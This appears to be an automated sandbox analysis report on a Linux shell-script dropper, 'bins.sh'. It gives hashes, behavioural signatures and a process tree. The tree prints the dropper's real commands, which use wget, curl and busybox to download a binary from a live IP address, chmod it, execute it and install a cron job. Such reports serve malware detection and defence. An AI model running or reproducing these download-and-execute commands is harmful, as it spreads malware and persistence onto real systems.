Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

9

bins.sh

debian-9-armhf

9

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

9

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    24-11-2024 05:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    2eff4db1aec35dadd57ea962525f018b

  • SHA1

    3d3b257f08b34cca400f3a527e8af3bc9bbc2770

  • SHA256

    f3b37a4959c6343e3e1368fd68c6e8ef5da2e811cc7df5e5cd289399c5667878

  • SHA512

    9ada41178570c692b386fcee9c50d4de9e4e3678c1c0f9ac27321bc96050a1f7bf301c57961379b0ad415b677a85b50d0d3b27ccdb98b4ed25c0676b1aa2bfec

  • SSDEEP

    192:mdFW7YIy7q5qZq5EdIkxxs7q27FYIvJpvRRh7A/ALA94wy7jnDtmJpIaTXQ08atE:FGI/HUIE94wyBP5IE94wTLB

Score
9/10
antivmdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Contacts a large (2136) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:648
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:651
        • /usr/bin/wget
          wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:653
        • /usr/bin/curl
          curl -O http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:670
        • /bin/busybox
          /bin/busybox wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:679
        • /bin/chmod
          chmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • File and Directory Permissions Modification
          PID:681
        • /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          ./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:682
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:684
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:685
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:686
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:687
              • /bin/rm
                rm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
                2⤵
                  PID:693
                • /usr/bin/wget
                  wget http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
                  2⤵
                    PID:696

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
                  Filesize

                  141KB

                  MD5

                  3ca8decdb1e52c423c521bfff02ac200

                  SHA1

                  8621ecd6807109b8541912ad9e134f6fb49bfd48

                  SHA256

                  dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                  SHA512

                  b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                  Download Submit

                • /var/spool/cron/crontabs/tmp.YUeOU4
                  Filesize

                  210B

                  MD5

                  a36b269f69477134611c5ee5f14bec00

                  SHA1

                  be89e44d0c604f31af8ad8d1e43f9d922590f777

                  SHA256

                  39a11717107395b58f735ac68a971ee51f0621bde40a365b601c85da08a02035

                  SHA512

                  bf0c6496aabf05ff946cc29c9e9a2d7618233a03a75778a3f7ab938a4e87e9e7f0d656686bcce3a9b6c5113afc3725ee95b40df6c7058dd8396878e91cc8f378

                  Download Submit